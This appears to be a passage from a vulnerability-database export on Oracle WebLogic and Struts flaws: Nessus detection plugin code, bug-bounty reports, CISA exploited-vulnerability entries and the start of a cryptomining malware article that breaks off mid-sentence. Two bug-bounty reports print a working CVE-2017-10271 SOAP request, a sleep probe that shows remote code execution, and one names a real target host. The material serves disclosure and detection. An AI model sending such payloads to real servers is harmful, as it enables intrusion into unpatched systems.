value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"obj.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix_sets = [];\nextra = NULL;\n\nspad_log(message:\"checking version [\" + version + \"]\");\n\nif (version =~ \"^12\\.1\\.3\\.\" && ver_compare(ver:version, fix:\"12.1.3.0.190716\", strict:FALSE) < 0)\n{\n fix_sets = [\n { 'fix_cpu' : '28710923', 'fix_adv' : '29694149'},\n { 'fix_cpu' : '29204657', 'fix_adv' : '29694149'},\n { 'fix_cpu' : '28710923', 'fix_adv' : '29792735'},\n { 'fix_cpu' : '29204657', 'fix_adv' : '29792736'},\n { 'fix_cpu' : '29633448', 'fix_adv' : '29633448'} # this little check-the-same-thing-2x code-hack allows us check for a supersede patch, thanks oracle!\n ];\n extra = '28710923 and 29694149 or 29204657 and 29694149 or 29633448\\n';\n}\nelse if (version =~ \"^10\\.3\\.6\\.\" && ver_compare(ver:version, fix:\"10.3.6.0.190716\", strict:FALSE) < 0)\n{\n fix_sets = [\n { 'fix_cpu' : '7HKN', 'fix_adv' : 'ICDZ'},\n { 'fix_cpu' : 'U5I2', 'fix_adv' : 'IL49'},\n { 'fix_cpu' : '7HKN', 'fix_adv' : '5H68'},\n { 'fix_cpu' : 'U5I2', 'fix_adv' : '6JJ4'},\n { 'fix_cpu' : 'MXLE', 'fix_adv' : 'MXLE'} # this little check-the-same-thing-2x code-hack allows us check for a supersede patch, thanks oracle!\n ];\n extra = '7HKN and ICDZ or U5I2 and IL49 or MXLE\\n';\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nforeach fix (fix_sets)\n{\n if( !isnull(install[fix['fix_cpu']]) && !isnull(install[fix['fix_adv']]) )\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n}\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version + \n '\\n Fix : ' + extra;\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:11:52", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition.\n (CVE-2016-1181)\n\n - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506)\n\n - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n (CVE-2017-3531)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1181", "CVE-2017-3506", "CVE-2017-3531", "CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/99528", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99528);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1181\",\n \"CVE-2017-3506\",\n \"CVE-2017-3531\",\n \"CVE-2017-5638\"\n );\n script_bugtraq_id(\n 91068,\n 91787,\n 96729,\n 97884\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"TRA\", value:\"TRA-2017-16\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the\n Apache Struts component due to improper handling of\n multithreaded access to an ActionForm instance. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted multipart request, to execute\n arbitrary code or cause a denial of service condition.\n (CVE-2016-1181)\n\n - An unspecified flaw exists in the Web Services\n subcomponent that allows an unauthenticated, remote\n attacker to modify or delete arbitrary data accessible\n to the server. (CVE-2017-3506)\n\n - A remote code execution vulnerability exists in the Web\n Container subcomponent due to improper handling of\n reflected PartItem File requests. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted request, to execute arbitrary code.\n (CVE-2017-3531)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. (CVE-2017-5638)\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?623d2c22\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2228898.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2017-16\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-16-444/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.170418\";\n fix = \"25388747\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.170418\";\n fix = \"25388793\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.0($|[^0-9])\")\n{\n fix_ver = \"12.2.1.0.170418\";\n fix = \"25388847\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.170418\";\n fix = \"25388843\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.170418\";\n fix = \"25388866\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-06-05T15:39:01", "bounty": 0.0, "description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. \n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-10T22:23:31", "type": "hackerone", "title": "U.S. Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-07-01T19:54:20", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-05T15:28:32", "bounty": 0.0, "description": "##Summary\n\nHello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`.\n\n##Steps To Reproduce\n\n* To reproduce, launch this request with BurpSuite\n* This request to the `https://raebilling.mtn.co.za/wls-wsat/CoordinatorPortType` will trigger sleep for 15 seconds (same applies for 20 secondes, 40 seconds):\n\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: raebilling.mtn.co.za\nContent-Length: 426\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>40000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\n==**POC:**== {F736913} {F736912} {F736915}\n\n## Suggested Mitigation/Remediation Actions\n* Patching WebLogic to the recent version will fix the issue.\n\n## Impact\n\n**This vulnerability allow an unauthenticated attacker:**\n* To perform Remote OS Command Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-03-04T13:45:59", "type": "hackerone", "title": "MTN Group: Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-04-25T12:39:51", "id": "H1:810755", "href": "https://hackerone.com/reports/810755", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-05T15:45:32", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:45:32", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:45:04", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-06-07T15:52:18", "description": "Oracle Corporation WebLogic Server contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Oracle Corporation WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2017-10271", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-05T15:37:18", "description": "Apache Struts Jakarta Multipart parser allows for malicious file upload using the Content-Type value, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache Struts Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-5638", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T15:52:18", "description": "Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Oracle WebLogic Server, Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-2725", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2018-02-26T16:50:59", "description": "While cryptocurrencies have been around for a long time and used for legitimate purposes, online criminals have certainly tarnished their reputation. Unfortunately, the same benefits offered by these decentralized and somewhat anonymous digital currencies were quickly abused to extort money, as was the case during the various ransomware outbreaks we\u2019ve witnessed in the last few years.\n\nAs the value of cryptocurrencies\u2014driven by the phenomenal rise of Bitcoin\u2014has increased significantly, a new kind of threat has become mainstream, and some might say has even surpassed all other cybercrime. Indeed, cryptocurrency mining is such a lucrative business that malware creators and distributors the world over are drawn to it like moths to a flame. The emergence of a multitude of new cryptocurrencies that can be mined by average computers has also contributed to the widespread abuse we are witnessing.\n\nMalwarebytes has been blocking coin miners with its multiple protection modules, including our real-time scanner and web protection technology. Ever since September 2017, malicious cryptomining has been our top detection overall.\n\n### Cryptomining malware\n\nTo maximize their profits, threat actors are leveraging the computing power of as many devices as they can. But first, they must find ways to deliver the malicious coin miners on a large enough scale.\n\nWhile the Wannacry ransomware was highly publicized for taking advantage of the leaked EternalBlue and DoublePulsar exploits, at least [two different groups](<https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators>) used those same vulnerabilities to infect hundreds of thousands of Windows servers with a cryptocurrency miner, ultimately generating millions of dollars in revenue.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/IP__scan-1.png> \"\" )\n\n_Figure 1: Worm scanning random IP addresses on port 445 _\n\nOther vulnerabilities, such as a flaw with Oracle's WebLogic Server ([CVE-2017-10271](<https://www.cvedetails.com/cve/CVE-2017-10271/>)), were also used to deliver miners onto servers at [universities and research institutions](<https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf>). While Oracle released a [patch](<https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html>) in October 2017, many did not apply it in a timely fashion, and a [PoC](<https://github.com/Luffin/CVE-2017-10271>) only facilitated widespread abuse.\n\nAs it turns out, servers happen to be a favorite among criminals because they offer the most horsepower, or to use the proper term, the highest hash rate to crunch through and solve the mathematical operations required by cryptomining. In recent times, we saw individuals who, against their better judgement, took this to the next level by using supercomputers in various [critical infrastructure](<https://www.wired.com/story/cryptojacking-critical-infrastructure/>) environments.\n\n### Spam and exploit kits campaigns\n\nEven malware authors have caught the cryptocurrency bug. Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG 